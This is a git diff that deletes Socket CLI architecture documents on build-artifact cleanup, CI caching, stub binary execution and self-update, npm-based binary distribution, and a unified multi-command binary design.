.custom-node-build/node-patched - -echo "Kept: .custom-node-build/node-yao-pkg (current)" -echo "Disk space freed: ~40GB" -``` - -### Clean All Build Artifacts - -```bash -#!/usr/bin/env bash -# scripts/clean-all.sh - -echo "Cleaning all build artifacts..." - -# Clean rollup output -pnpm run clean:dist - -# Clean pkg binaries -rm -rf pkg-binaries/ -rm -f socket socket-* - -# Clean Node.js builds (optional - takes 30-60 min to rebuild) -# rm -rf .custom-node-build/ - -echo "Build artifacts cleaned" -echo "Run 'pnpm run build' to rebuild" -``` - -### Clean Everything (Fresh Start) - -```bash -#!/usr/bin/env bash -# scripts/clean-everything.sh - -echo "⚠️ This will remove ALL build artifacts and dependencies" -echo "You'll need to reinstall and rebuild everything" -read -p "Are you sure? (y/N) " -n 1 -r -echo -if [[ $REPLY =~ ^[Yy]$ ]]; then - # Remove dependencies - rm -rf node_modules/ - - # Remove build artifacts - rm -rf dist/ - rm -rf pkg-binaries/ - rm -rf .custom-node-build/ - - # Remove caches - rm -rf .rollup.cache/ - rm -rf .cache/ - - echo "Everything cleaned!" - echo "Run 'pnpm install && pnpm run build:yao-pkg:node' to start fresh" -fi -``` - ---- - -## CI/CD Recommendations - -### GitHub Actions - -**Option 1: Build Node.js on each run (slow)** -```yaml -- name: Build custom Node.js - run: pnpm run build:yao-pkg:node # 30-60 minutes -``` - -**Option 2: Cache Node.js build (faster)** -```yaml -- name: Cache Node.js build - uses: actions/cache@v4 - with: - path: .custom-node-build/node-yao-pkg - key: node-yao-pkg-v24.9.0-${{ runner.os }}-${{ runner.arch }} - -- name: Build Node.js if not cached - if: steps.cache-node.outputs.cache-hit != 'true' - run: pnpm run build:yao-pkg:node -``` - -**Option 3: Use pre-built binary (fastest)** -```yaml -- name: Download pre-built Node.js - run: | - curl -L https://github.com/.../releases/.../node-v24.10.0-yao-pkg.tar.gz | tar xz - mv node .custom-node-build/node-yao-pkg/out/Release/node -``` - -### Artifact Uploads - -```yaml -- name: Upload pkg binaries - uses: actions/upload-artifact@v4 - with: - name: socket-${{ matrix.platform }} - path: pkg-binaries/socket-${{ matrix.platform }} - retention-days: 7 # Don't keep forever -``` - ---- - -## Best Practices - -### For Local Development - -1. **Keep only current Node build:** - ```bash - # Remove old builds - rm -rf .custom-node-build/node - rm -rf .custom-node-build/node-patched - - # Keep: .custom-node-build/node-yao-pkg - ``` - -2. **Don't commit build artifacts:** - - `.gitignore` is already configured - - Run `git status` to verify - -3. **Clean before release:** - ```bash - pnpm run clean:dist - pnpm run build:cli - pnpm run build:yao-pkg - ``` - -### For CI/CD - -1. **Cache Node.js builds** to avoid 30-60 minute build times -2. **Upload artifacts** to GitHub Releases, not repo -3. **Build only needed platforms** (linux-x64 for Docker, etc.) -4. **Set artifact retention** (7-30 days, not forever) - -### For Distribution - -1. **Release artifacts to GitHub Releases:** - - Upload pkg binaries as release assets - - Don't include in npm package - - Users download specific platform - -2. **npm package includes:** - - Source code (`src/`) - - Rollup output (`dist/`) - - No binaries - -3. **Docker images:** - - Copy `pkg-binaries/socket-linux-x64` to image - - Don't include full repo - ---- - -## Directory Size Reference - -| Path | Size | Can Delete? | Rebuild Time | -|------|------|-------------|--------------| -| `node_modules/` | 2-3 GB | Yes | `pnpm install` (~2 min) | -| `.custom-node-build/node-yao-pkg/` | 19-20 GB | No (current) | 30-60 minutes | -| `.custom-node-build/node/` | 20 GB | Yes (old) | N/A | -| `.custom-node-build/node-patched/` | 20 GB | Yes (old) | N/A | -| `dist/` | 10-15 MB | Yes | `pnpm run build:cli` (~10 sec) | -| `pkg-binaries/` | 500 MB | Yes | `pnpm run build:yao-pkg` (~30 sec) | - -**Total reclaimable:** ~40 GB (by removing old Node builds) - ---- - -## Troubleshooting - -### "Where is the custom Node.js binary?" - -**Location:** `.custom-node-build/node-yao-pkg/out/Release/node` - -**How to rebuild:** -```bash -pnpm run build:yao-pkg:node -``` - -### "Where do pkg binaries go?" - -**Location:** `pkg-binaries/` directory - -**Configured in:** `pkg.json` → `outputPath` field - -**How to rebuild:** -```bash -pnpm run build:yao-pkg -``` - -### "Why is .custom-node-build so large?" - -Node.js source is ~1.5GB, plus build artifacts (~17-18GB) makes ~19-20GB total per build. - -**Solution:** Keep only the current build (`node-yao-pkg`), delete old ones: -```bash -rm -rf .custom-node-build/node -rm -rf .custom-node-build/node-patched -``` - -### "Can I commit pkg binaries?" - -**No.** They're too large (90-110MB each) and platform-specific. - -**Instead:** -- Upload to GitHub Releases -- Build in CI/CD -- Download on demand - ---- - -## Summary - -### Tracked in Git -- ✅ Source code (`src/`) -- ✅ Build scripts (`scripts/`) -- ✅ Socket CLI patches (`patches/`) -- ✅ Configuration files (`pkg.json`, `package.json`, etc.) -- ✅ Documentation (`docs/`) - -### Not Tracked in Git (Build Artifacts) -- ❌ Custom Node.js builds (`.custom-node-build/`) -- ❌ pkg binaries (`pkg-binaries/`, `socket-*`) -- ❌ Rollup output (`dist/`) -- ❌ Dependencies (`node_modules/`) -- ❌ Caches (`.rollup.cache/`, `.cache/`) - -### Cleanup Recommendation -Remove old Node builds to free ~40GB: -```bash -rm -rf .custom-node-build/node .custom-node-build/node-patched -``` - -### Build From Scratch -```bash -# Clean start -pnpm install # Install dependencies (2-3 min) -pnpm run build:yao-pkg:node # Build Node.js (30-60 min, one-time) -pnpm run build:cli # Build CLI (10 sec) -pnpm run build:yao-pkg # Build pkg binaries (30 sec) -``` diff --git a/docs/architecture/stub-execution.md b/docs/architecture/stub-execution.md deleted file mode 100644 index cbad48146..000000000 --- a/docs/architecture/stub-execution.md +++ /dev/null @@ -1,439 +0,0 @@ -# Stub Execution & Update Flow - -This document describes the complete flow of Socket CLI's stub execution mechanism, including Node.js runtime selection, update checking logic, and permission handling. - -## Directory Structure - -``` -~/.socket/ -├── _cli/ # CLI root (all CLI-related data) -│ ├── package/ # @socketsecurity/cli from npm -│ │ ├── package.json -│ │ ├── dist/ -│ │ │ ├── cli.js # Main CLI entry point -│ │ │ ├── commands/ -│ │ │ └── utils/ -│ │ ├── node_modules/ -│ │ ├── requirements.json -│ │ ├── translations.json -│ │ └── shadow-bin/ -│ │ -│ ├── stub/ # Stub management (SEA binary updates) -│ │ ├── downloads/ # Downloaded stub binaries -│ │ ├── staging/ # Staging area for stub updates -│ │ └── backups/ # Timestamped stub backups -│ │ -│ ├── .install.lock # Installation lock (transient, only during install) -│ └── cli-1.1.24.tgz # Downloaded tarball (transient, deleted after extract) -│ -└── _cacache/ # All caches (cacache format) - ├── content-v2/ # Content-addressable storage - ├── index-v5/ # Index for lookups - └── tmp/ # Temporary files -``` - -## 1. Stub Startup - Node.js Decision Tree - -``` -User runs: /usr/local/bin/socket scan - ↓ -┌──────────────────────────────────────────────────────────────────────┐ -│ Stub Binary (yao-pkg executable) │ -│ Checks: ~/.socket/_dlx/package/package.json exists? │ -└──────────────────────────────────────────────────────────────────────┘ - ↓ No ↓ Yes -┌──────────────────────────┐ ┌──────────────────────────────────────┐ -│ Download & Install CLI │ │ CLI Already Installed │ -│ (see install flow) │ └──────────────────────────────────────┘ -└──────────────────────────┘ ↓ - ↓ ┌──────────────────────────────────────┐ - └────────────────────→│ Detect Node.js Runtime: │ - │ │ - │ 1. Check system Node.js: │ - │ spawn('node', ['--version']) │ - │ │ - │ 2. Parse version (e.g., "v22.0.0") │ - │ │ - │ 3. Compare: version >= MIN_NODE_VER? │ - │ (MIN_NODE_VERSION = 22) │ - └──────────────────────────────────────┘ - ↓ - ┌───────────────────────┴───────────────────────┐ - ↓ System Node >= v22 ↓ No/Old Node -┌──────────────────────────────────────┐ ┌──────────────────────────────────────┐ -│ Use System Node.js: │ │ Use Embedded Runtime: │ -│ │ │ │ -│ spawn('node', [ │ │ spawn(process.argv[0], [ │ -│ '--no-addons', │ │ '--no-addons', │ -│ '--no-warnings', │ │ '--no-warnings', │ -│ '~/.socket/_dlx/package/dist/cli.js', │ '~/.socket/_dlx/package/dist/cli.js', │ -│ ...args │ │ ...args │ -│ ], { │ │ ], { │ -│ }) │ │ stdio: ['inherit', 'inherit', │ -│ │ │ 'inherit', 'ipc'] │ -│ Benefits: │ │ }) │ -│ - Faster startup (~50-200ms) │ │ │ -│ - Smaller memory footprint │ │ Benefits: │ -│ - Native module support │ │ - Works without Node.js installed │ -└──────────────────────────────────────┘ │ - Consistent runtime version │ - ↓ └──────────────────────────────────────┘ - └───────────────────────┬───────────────────────┘ - ↓ -┌──────────────────────────────────────────────────────────────────────┐ -│ IPC Handshake (both cases): │ -│ │ -│ child.send({ │ -│ SOCKET_IPC_HANDSHAKE: { │ -│ SOCKET_CLI_STUB_PATH: '/usr/local/bin/socket' │ -│ } │ -│ }) │ -│ │ -│ CLI receives stub path for: │ -│ - isSeaBinary() detection │ -│ - Self-update stub replacement │ -│ │ -│ Note: CLI knows its own path via __filename/import.meta.url │ -└──────────────────────────────────────────────────────────────────────┘ -``` - -### Node.js Detection Logic - -```typescript -// In src/sea/stub.mts -async function detectSystemNode(): Promise { - try { - const nodeCmd = process.platform === 'win32' ? 'node.exe' : 'node' - - // Check if node exists and get version - const { stdout } = await execFile(nodeCmd, ['--version'], { timeout: 2000 }) - - // Parse version (e.g., "v22.0.0" -> 22) - const versionMatch = stdout.trim().match(/^v(\d+)\./) - if (!versionMatch) return null - - const majorVersion = parseInt(versionMatch[1], 10) - if (majorVersion >= MIN_NODE_VERSION) { - debugLog(`System Node.js v${majorVersion} meets requirements (>= v${MIN_NODE_VERSION})`) - return nodeCmd - } else { - debugLog(`System Node.js v${majorVersion} too old (requires >= v${MIN_NODE_VERSION})`) - return null - } - } catch { - return null // No system Node.js or error occurred - } -} -``` - -## 2. Update Checker Package Name Logic - -The update checker uses different package names depending on how the CLI is running: - -```typescript -// In src/cli.mts -async function getUpdatePackageName(): string { - if (isSeaBinary()) { - // SEA binaries check the "socket" package on npm - // This contains the stub binary distributions - return 'socket' - } else { - // Regular npm installs check "@socketsecurity/cli" - // This is the actual CLI package - return '@socketsecurity/cli' - } -} - -// Usage in scheduleUpdateCheck: -await scheduleUpdateCheck({ - name: await getUpdatePackageName(), - version: packageJson.version, - authInfo: lookupRegistryAuthToken(registryUrl, { recursive: true }), -}) -``` - -### Why Two Different Packages? - -- **`@socketsecurity/cli`**: The main CLI package with JavaScript code - - Changes frequently (new features, bug fixes) - - ~30MB when installed with node_modules - - Downloaded and extracted to `~/.socket/_dlx/package/` - -- **`socket`**: The stub binary package - - Changes rarely (only for bootstrap updates) - - Platform-specific binaries (~1-5MB each) - - Used to update `/usr/local/bin/socket` executable - -## 3. Installation Flow with Permissions - -``` -Download & Extract CLI: - ↓ -┌──────────────────────────────────────────────────────────────────────┐ -│ 1. Download @socketsecurity/cli tarball │ -│ → ~/.socket/_dlx/cli-1.1.24.tgz │ -└──────────────────────────────────────────────────────────────────────┘ - ↓ -┌──────────────────────────────────────────────────────────────────────┐ -│ 2. Extract with nanotar: │ -│ for (const file of files) { │ -│ const targetPath = path.join(CLI_PACKAGE_DIR, sanitizedPath) │ -│ await fs.writeFile(targetPath, fileData) │ -│ │ -│ // CRITICAL: Preserve executable permissions │ -│ if (file.attrs?.mode) { │ -│ const mode = parseInt(file.attrs.mode, 8) │ -│ await fs.chmod(targetPath, mode) │ -│ } │ -│ │ -│ // Special handling for bin/ and shadow-bin/ │ -│ if (targetPath.includes('/bin/') || │ -│ targetPath.includes('/shadow-bin/') || │ -│ targetPath.includes('/dist/shadow')) { │ -│ await fs.chmod(targetPath, 0o755) // rwxr-xr-x │ -│ } │ -│ } │ -└──────────────────────────────────────────────────────────────────────┘ - ↓ -┌──────────────────────────────────────────────────────────────────────┐ -│ 3. Cleanup: │ -│ - remove(~/.socket/_dlx/cli-1.1.24.tgz) # Delete tarball │ -│ - remove(~/.socket/_dlx/.install.lock) # Release lock │ -└──────────────────────────────────────────────────────────────────────┘ -``` - -### Permission Handling Details - -NPM tarballs include Unix permissions in their metadata: -- Regular files: `0644` (rw-r--r--) -- Executable files: `0755` (rwxr-xr-x) - -The bootstrap ensures executables remain executable: - -1. **Preserve tarball permissions**: Parse and apply the mode from tarball metadata -2. **Force executable for critical paths**: - - `bin/` - CLI entry points - - `shadow-bin/` - npm/npx wrappers - - `dist/shadow/` - Shadow binary implementations - -## 4. Stub Update Flow with Permissions - -``` -socket self-update (when isSeaBinary()): - ↓ -┌──────────────────────────────────────────────────────────────────────┐ -│ Check both packages: │ -│ 1. npm view socket version → Stub binary updates │ -│ 2. npm view @socketsecurity/cli version → CLI code updates │ -└──────────────────────────────────────────────────────────────────────┘ - ↓ -┌──────────────────────────────────────────────────────────────────────┐ -│ Update Stub Binary: │ -│ │ -│ 1. Download new stub: │ -│ const stubName = `socket-${platform}-${arch}${ext}` │ -│ → ~/.socket/_dlx/stub/downloads/socket-darwin-arm64 │ -│ │ -│ 2. CRITICAL: Set executable permissions │ -│ await fs.chmod(downloadPath, 0o755) │ -│ │ -│ 3. Clear macOS quarantine (if macOS): │ -│ await exec('xattr', ['-cr', downloadPath]) │ -│ │ -│ 4. Stage with permissions: │ -│ const stagingPath = ~/.socket/_dlx/stub/staging/socket │ -│ await fs.copyFile(downloadPath, stagingPath) │ -│ await fs.chmod(stagingPath, 0o755) │ -│ │ -│ 5. Backup current: │ -│ const backupPath = `~/.socket/_dlx/stub/backups/socket-${ts}` │ -│ await fs.copyFile(currentStubPath, backupPath) │ -│ await fs.chmod(backupPath, 0o755) // Preserve exec │ -│ │ -│ 6. Atomic replace: │ -│ if (process.platform === 'win32') { │ -│ // Windows: rename current, then replace │ -│ await fs.rename(currentPath, tempName) │ -│ await fs.rename(stagingPath, currentPath) │ -│ } else { │ -│ // Unix: atomic rename │ -│ await fs.rename(stagingPath, currentPath) │ -│ } │ -└──────────────────────────────────────────────────────────────────────┘ -``` - -### Platform-Specific Considerations - -**macOS**: -- Must clear quarantine attributes: `xattr -cr ` -- Ad-hoc code signing may be required: `codesign --sign - ` - -**Windows**: -- Cannot replace running executable directly -- Must rename current, then replace -- `.exe` extension required - -**Linux**: -- Simple atomic rename works -- No special attributes needed - -## 5. Lock File Management - -The bootstrap uses `.install.lock` to prevent concurrent installations: - -```typescript -async function acquireLock(): Promise { - const lockPath = path.join(SOCKET_CLI_DIR, '.install.lock') - - for (let attempt = 0; attempt < LOCK_MAX_RETRIES; attempt++) { - try { - // Atomic check-and-create - await fs.writeFile(lockPath, String(process.pid), { flag: 'wx' }) - return lockPath - } catch (error) { - if (error.code === 'EEXIST') { - // Check if lock holder is still alive - const lockPid = await fs.readFile(lockPath, 'utf8') - try { - process.kill(lockPid, 0) // Check if process exists - // Process exists, wait and retry - await sleep(LOCK_RETRY_DELAY_MS) - } catch { - // Process dead, remove stale lock - await remove(lockPath) - } - } - } - } - throw new Error('Failed to acquire lock after 30 seconds') -} -``` - -**Critical**: Lock is **always** released in `finally` block: -```typescript -try { - lockPath = await acquireLock() - // ... installation ... -} finally { - if (lockPath) { - await releaseLock(lockPath) // Guaranteed cleanup - } -} -``` - -## 6. Cache Management - -All caches use `_cacache` directory: - -```typescript -// Update check cache -const cacheKey = 'update-check:@socketsecurity/cli' -await cacache.put(CACACHE_DIR, cacheKey, JSON.stringify({ - timestamp: Date.now(), - currentVersion: '1.1.24', - latestVersion: '1.1.25', - lastChecked: Date.now(), -})) - -// Socket API cache -const apiCacheKey = `socket-api:${endpoint}:${hash(params)}` -await cacache.put(CACACHE_DIR, apiCacheKey, response) - -// GitHub API cache -const ghCacheKey = `github:${owner}/${repo}:${endpoint}` -await cacache.put(CACACHE_DIR, ghCacheKey, data) -``` - -## 7. Error Recovery - -### Installation Failures - -If installation fails: -1. Tarball is deleted (cleanup in `finally`) -2. Lock is released (cleanup in `finally`) -3. Partial extraction remains (allows debugging) - -To recover: -```bash -# Clean partial installation -rm -rf ~/.socket/_dlx/package - -# Retry -socket --version -``` - -### Update Failures - -If update fails: -1. New files remain in staging/downloads -2. Original binary unchanged -3. Backup preserved in backups/ - -To recover: -```bash -# Clean staging -rm -rf ~/.socket/_dlx/stub/staging/* -rm -rf ~/.socket/_dlx/stub/downloads/* - -# Retry -socket self-update -``` - -## 8. Performance Characteristics - -### Startup Times - -| Scenario | Time | Notes | -|----------|------|-------| -| System Node.js (cached) | ~50-200ms | Fastest path | -| Embedded runtime (cached) | ~100-500ms | SEA overhead | -| First install | ~3-13s | Network dependent | -| Cache check | ~1ms | File existence check | -| Node version detection | ~10-50ms | Subprocess spawn | - -### Disk Usage - -| Component | Size | Notes | -|-----------|------|-------| -| Bootstrap stub | ~1-5MB | Platform-specific | -| CLI package | ~30MB | Includes node_modules | -| Stub backups | ~1-5MB each | Configurable retention | -| Cache (_cacache) | Variable | Auto-pruned by cacache | - -## 9. Security Considerations - -### Path Protection - -The `remove()` function prevents catastrophic deletes: -```typescript -async function remove(filepath: string, options?: { force?: boolean }): Promise { - const absolutePath = path.resolve(filepath) - - // Prevent deleting outside SOCKET_HOME - const relation = path.relative(SOCKET_HOME, absolutePath) - if (!isInside) { - throw new Error(`Cannot delete outside SOCKET_HOME`) - } - - // Prevent deleting cwd - if (absolutePath === cwd) { - throw new Error('Cannot delete current working directory') - } -} -``` - -### Permission Preservation - -- Tarball permissions are preserved during extraction -- Executable bits are enforced for critical binaries -- Backups maintain original permissions - -### Integrity Verification - -Future enhancements: -- SHA256 checksums for downloaded packages -- GPG signature verification -- Certificate pinning for HTTPS - ---- - -*Document created: 2025-10-07* \ No newline at end of file diff --git a/docs/architecture/stub-package.md b/docs/architecture/stub-package.md deleted file mode 100644 index 5f602114d..000000000 --- a/docs/architecture/stub-package.md +++ /dev/null @@ -1,390 +0,0 @@ -# Socket CLI Stub Package & Binary Distribution Flow - -This document describes how Socket CLI handles platform-specific binary distribution through the `socket` npm package, from CI/CD generation to installation on user machines. - -## Overview - -The Socket CLI uses a two-tier distribution model: -1. **`socket` npm package**: Lightweight npm package that downloads platform-specific binaries -2. **`@socketsecurity/cli` npm package**: Full CLI implementation (JavaScript/TypeScript) - -The binaries are built using yao-pkg (enhanced fork of vercel/pkg), not Node.js native SEA. - -## Architecture Components - -``` -┌─────────────────────────────────────────────────────────────────────────┐ -│ Binary Distribution Flow │ -├─────────────────────────────────────────────────────────────────────────┤ -│ │ -│ 1. CI/CD Build 2. GitHub Releases 3. NPM Package │ -│ ┌──────────────┐ ┌────────────────┐ ┌──────────────┐ │ -│ │ Build Matrix │───────>│ Binary Assets │<────│ socket@1.x │ │ -│ │ (6 platforms)│ │ socket-*.exe │ │ install.js │ │ -│ └──────────────┘ └────────────────┘ └──────────────┘ │ -│ │ │ -│ ↓ │ -│ ┌──────────────┐ │ -│ │ User Machine │ │ -│ │ npm install │ │ -│ └──────────────┘ │ -└─────────────────────────────────────────────────────────────────────────┘ -``` - -## 1. CI/CD Binary Generation - -### Build Matrix - -The GitHub Actions workflow (`release-sea.yml`) builds binaries for 6 platform/architecture combinations: - -```yaml -matrix: - include: - # Linux builds - - os: ubuntu-latest - platform: linux - arch: x64 - - os: ubuntu-latest - platform: linux - arch: arm64 # Cross-compilation - - # macOS builds (native compilation) - - os: macos-latest - platform: darwin - arch: x64 - - os: macos-latest - platform: darwin - arch: arm64 - - # Windows builds - - os: windows-latest - platform: win32 - arch: x64 - - os: windows-2022-arm64 - platform: win32 - arch: arm64 # Native ARM64 runner -``` - -### Build Process - -Each platform build follows these steps: - -1. **Build Stub**: Compile TypeScript stub to CommonJS - ```bash - pnpm run build:sea:stub - # Outputs: dist/sea/stub.cjs - ``` - -2. **Package with yao-pkg**: Create single executable - - Uses yao-pkg (enhanced fork of vercel/pkg) - - Not Node.js 24's native SEA feature - - Embeds Node.js runtime + stub code - - Configures platform-specific settings - -3. **Platform Post-Processing**: - - **Windows**: Sign with certificate (if available) - - **macOS**: Remove quarantine attributes, ad-hoc sign - - **Linux**: Set executable permissions - -### Binary Naming Convention - -Binaries follow a consistent naming pattern: -``` -socket-{platform}-{arch}{extension} - -Examples: -- socket-linux-x64 -- socket-darwin-arm64 -- socket-win32-x64.exe -``` - -Platform mapping: -- `darwin` → `macos` (in download URLs) -- `win32` → `win` (in download URLs) - -## 2. GitHub Release Storage - -### Release Structure - -Binaries are uploaded to GitHub releases with this structure: -``` -https://github.com/SocketDev/socket-cli/releases/download/v{version}/ -├── socket-linux-x64 -├── socket-linux-arm64 -├── socket-darwin-x64 -├── socket-darwin-arm64 -├── socket-win32-x64.exe -└── socket-win32-arm64.exe -``` - -### Release Workflow - -1. **Trigger**: Manual workflow dispatch or GitHub release creation -2. **Build**: All platforms built in parallel -3. **Upload**: Binaries uploaded to release assets -4. **Draft**: Releases created as drafts for manual review -5. **Publish**: Manual step to make release public - -### Versioning - -- Release tags follow semver: `v1.1.24` -- Binary URLs are deterministic based on version -- Fallback to latest release if specific version not found - -## 3. NPM Package Structure - -### Package Contents - -The `socket` npm package (`src/sea/npm-package/`) contains: - -``` -socket/ -├── package.json # Package metadata & postinstall script -├── install.js # Platform detection & binary download -├── socket # Fallback shim (replaced by binary) -└── README.md # Usage instructions -``` - -### Package.json Configuration - -```json -{ - "name": "socket", - "version": "1.1.24", - "bin": { - "socket": "socket" - }, - "scripts": { - "postinstall": "node install.js" - }, - "preferGlobal": true, - "engines": { - "node": ">=18.18.0" - } -} -``` - -## 4. Installation Flow - -### Platform Detection - -The `install.js` script detects the current platform: - -```javascript -function getBinaryName() { - const platform = PLATFORM_MAP[os.platform()] - const arch = ARCH_MAP[os.arch()] - - if (!platform || !arch) { - throw new Error(`Unsupported platform: ${os.platform()} ${os.arch()}`) - } - - const extension = os.platform() === 'win32' ? '.exe' : '' - return `socket-${platform}-${arch}${extension}` -} -``` - -### Platform Mappings - -```javascript -const PLATFORM_MAP = { - darwin: 'macos', // macOS - linux: 'linux', - win32: 'win' // Windows -} - -const ARCH_MAP = { - arm64: 'arm64', // ARM 64-bit (Apple Silicon, etc.) - x64: 'x64' // Intel/AMD 64-bit -} -``` - -### Download Process - -``` -npm install -g socket - ↓ -┌──────────────────────────────────────────────────────────┐ -│ Postinstall Script (install.js) │ -│ │ -│ 1. Detect Platform: │ -│ os.platform() + os.arch() → socket-linux-x64 │ -│ │ -│ 2. Construct Download URL: │ -│ https://github.com/.../v1.1.24/socket-linux-x64 │ -│ │ -│ 3. Download Binary: │ -│ HTTPS GET with redirects → temp file │ -│ │ -│ 4. Set Permissions: │ -│ chmod 755 (Unix) or no-op (Windows) │ -│ │ -│ 5. Replace Shim: │ -│ Atomic rename from temp to 'socket' │ -└──────────────────────────────────────────────────────────┐ -``` - -### Error Handling - -The installation is designed to be resilient: - -```javascript -try { - // Download and install binary -} catch (error) { - console.error('Failed to install Socket CLI binary:', error.message) - console.error('You may need to install from source: npm install @socketsecurity/cli') - // Don't fail the install - allow fallback -} -``` - -Fallback options: -1. Keep shim script that shows error message -2. User can install `@socketsecurity/cli` directly -3. Manual binary download from GitHub releases - -## 5. Binary Execution Flow - -Once installed, the binary execution follows this flow: - -``` -$ socket scan - ↓ -┌──────────────────────────────────────────┐ -│ Platform Binary (socket-linux-x64) │ -│ │ -│ 1. Stub Code Executes │ -│ 2. Check ~/.socket/_dlx/package/ │ -│ 3. Download @socketsecurity/cli if needed │ -│ 4. Spawn Node.js with CLI │ -└──────────────────────────────────────────┘ -``` - -## 6. Update Mechanism - -The stub package has a dual update mechanism: - -### Stub Updates (Binary) - -When running `socket self-update` as a SEA binary: -1. Check npm registry for `socket` package version -2. Compare with embedded version -3. Download new binary from GitHub if available -4. Atomic replacement with backup - -### CLI Updates (JavaScript) - -The actual CLI code updates independently: -1. Check npm registry for `@socketsecurity/cli` version -2. Download and extract new tarball to `~/.socket/_dlx/package/` -3. Next execution uses new CLI code - -## 7. Platform Support - -### Fully Supported (CI builds) -- Linux x64 -- Linux ARM64 -- macOS x64 (Intel) -- macOS ARM64 (Apple Silicon) -- Windows x64 -- Windows ARM64 - -### Unsupported Platforms -For unsupported platforms, users must: -1. Install Node.js v22+ -2. Install `@socketsecurity/cli` directly -3. Use `npx @socketsecurity/cli` or global install - -## 8. Security Considerations - -### Binary Integrity -- Binaries built in GitHub Actions (auditable) -- SHA256 checksums in release notes -- npm provenance for package publishing - -### Download Security -- HTTPS only for downloads -- GitHub releases as trusted source -- Fallback to error rather than insecure operation - -### Platform Security -- **macOS**: Quarantine attributes cleared, ad-hoc signed -- **Windows**: Optional code signing with certificate -- **Linux**: Standard executable permissions - -## 9. Local Development - -### Building Binaries Locally - -```bash -# Build for current platform -pnpm run build --sea - -# Build for specific platform -pnpm run build --sea -- --platform=darwin --arch=arm64 - -# Build all platforms (requires cross-compilation setup) -pnpm run build --sea -- --all -``` - -### Testing Installation - -```bash -# Test install.js locally -cd src/sea/npm-package -npm_config_global=true node install.js - -# Test with specific version -SOCKET_VERSION=1.1.24 node install.js -``` - -### Publishing Flow - -```bash -# Build all binaries -pnpm run build --sea - -# Upload to GitHub (requires gh CLI) -pnpm run publish:sea:github - -# Publish npm package -cd src/sea/npm-package -npm publish --access public -``` - -## 10. Troubleshooting - -### Common Issues - -1. **"Unsupported platform" error** - - Platform/arch combination not in matrix - - Solution: Install `@socketsecurity/cli` directly - -2. **Download fails during install** - - Network issues or GitHub rate limiting - - Solution: Manual download from releases page - -3. **Permission denied on Unix** - - Binary not marked executable - - Solution: `chmod +x $(which socket)` - -4. **Windows Defender blocks execution** - - Unsigned binary flagged - - Solution: Add exception or build signed binary - -### Debug Environment Variables - -```bash -# Enable debug output -DEBUG=1 npm install -g socket - -# Skip binary download (keep shim) -SKIP_BINARY_DOWNLOAD=1 npm install -g socket - -# Use specific Node.js version for SEA -SOCKET_CLI_SEA_NODE_VERSION=24.8.0 pnpm run build --sea -``` - ---- - -*Document created: 2025-10-07* \ No newline at end of file diff --git a/docs/architecture/unified-binary.md b/docs/architecture/unified-binary.md deleted file mode 100644 index 60e8524f8..000000000 --- a/docs/architecture/unified-binary.md +++ /dev/null @@ -1,208 +0,0 @@ -# Unified Binary Architecture for SEA/Yao Packages - -## Overview - -Socket CLI provides multiple command-line tools (`socket`, `socket-npm`, `socket-npx`, etc.), but Node.js SEA and similar packaging tools like Yao only support creating a single executable from one entry point. This document explains how we solve this limitation using a unified binary architecture. - -## The Challenge - -Our package.json defines 5 different binaries: -```json -{ - "bin": { - "socket": "bin/cli.js", // Main CLI - "socket-npm": "bin/npm-cli.js", // npm wrapper - "socket-npx": "bin/npx-cli.js", // npx wrapper - "socket-pnpm": "bin/pnpm-cli.js", // pnpm wrapper - "socket-yarn": "bin/yarn-cli.js" // yarn wrapper - } -} -``` - -SEA (Single Executable Application) limitation: -- Can only create ONE executable binary -- Cannot package multiple entry points -- Same limitation exists in Yao, pkg, nexe, etc. - -## The Solution: Command Detection - -We use a single unified binary that detects how it was invoked and routes to the appropriate behavior. - -### How It Works - -1. **Single Binary**: Build one executable named `socket` -2. **Symlinks/Copies**: Create symlinks (Unix) or copies (Windows) for other commands: - - `socket-npm` → `socket` - - `socket-npx` → `socket` - - `socket-pnpm` → `socket` - - `socket-yarn` → `socket` - -3. **Command Detection**: The binary detects its invocation name: - ```javascript - const INVOKED_AS = path.basename(process.argv0) - const COMMAND_MAP = { - 'socket': 'cli.js', - 'socket-npm': 'npm-cli.js', - 'socket-npx': 'npx-cli.js', - // ... - } - ``` - -4. **Routing**: Based on the detected name, it spawns the appropriate CLI tool - -## Implementation - -### Bootstrap Code (`src/sea/bootstrap-unified.mts`) - -The unified bootstrap: -1. Detects how it was invoked -2. Downloads the Socket CLI package if needed (first run) -3. Routes to the correct entry point based on invocation name -4. Spawns the appropriate command - -### Build Process - -```bash -# Build the unified SEA binary -node scripts/build-unified-sea.mjs - -# This creates: -# dist/sea/socket (main binary) -# dist/sea/socket-npm (symlink/copy) -# dist/sea/socket-npx (symlink/copy) -# dist/sea/socket-pnpm (symlink/copy) -# dist/sea/socket-yarn (symlink/copy) -``` - -### Platform Differences - -**Unix/macOS:** -- Uses symlinks (lightweight, single binary on disk) -- All symlinks point to the same `socket` binary -- File system reports different `argv[0]` based on symlink name - -**Windows:** -- Uses file copies (symlinks require admin privileges) -- Each `.exe` is a full copy but same internal logic -- Process name detection works the same way - -## Distribution - -When distributing the SEA package: - -### Option 1: Distribute All Files -``` -socket-cli-v1.0.0-darwin-x64.tar.gz -├── socket -├── socket-npm -> socket -├── socket-npx -> socket -├── socket-pnpm -> socket -└── socket-yarn -> socket -``` - -### Option 2: Single Binary + Install Script -``` -socket-cli-v1.0.0-darwin-x64.tar.gz -├── socket -└── install.sh # Creates symlinks during installation -``` - -### Option 3: Package Manager Integration -```bash -# npm package could create symlinks in postinstall -npm install -g @socketsecurity/cli-binary -``` - -## Testing - -Test that command routing works: - -```bash -# Test main CLI -./socket --version - -# Test npm wrapper (should intercept npm commands) -./socket-npm install express - -# Test npx wrapper -./socket-npx create-react-app - -# Test pnpm wrapper -./socket-pnpm install - -# Test yarn wrapper -./socket-yarn add lodash -``` - -## Benefits - -1. **Single Binary**: Only one large binary to build and distribute -2. **Smaller Size**: Symlinks add no disk space -3. **Consistent Updates**: Update one binary, all commands updated -4. **Cross-Platform**: Works on Windows, macOS, Linux -5. **User Transparent**: Users interact with expected command names - -## Compatibility with Yao - -This approach works identically with Yao or other Node.js packagers: - -```javascript -// yao.config.js -module.exports = { - entry: 'src/sea/bootstrap-unified.js', - output: 'socket', - // ... other config -} -``` - -Then create symlinks/copies for the other commands after Yao builds the binary. - -## Future Enhancements - -### Subcommand Detection -Could also support subcommand style: -```bash -socket cli ... # Main CLI -socket npm ... # npm wrapper -socket npx ... # npx wrapper -``` - -### Multi-Binary Builds -For environments where symlinks aren't viable, could build separate binaries: -```javascript -// Build each binary with environment variable -process.env.SOCKET_BINARY_MODE = 'npm' -// Then in 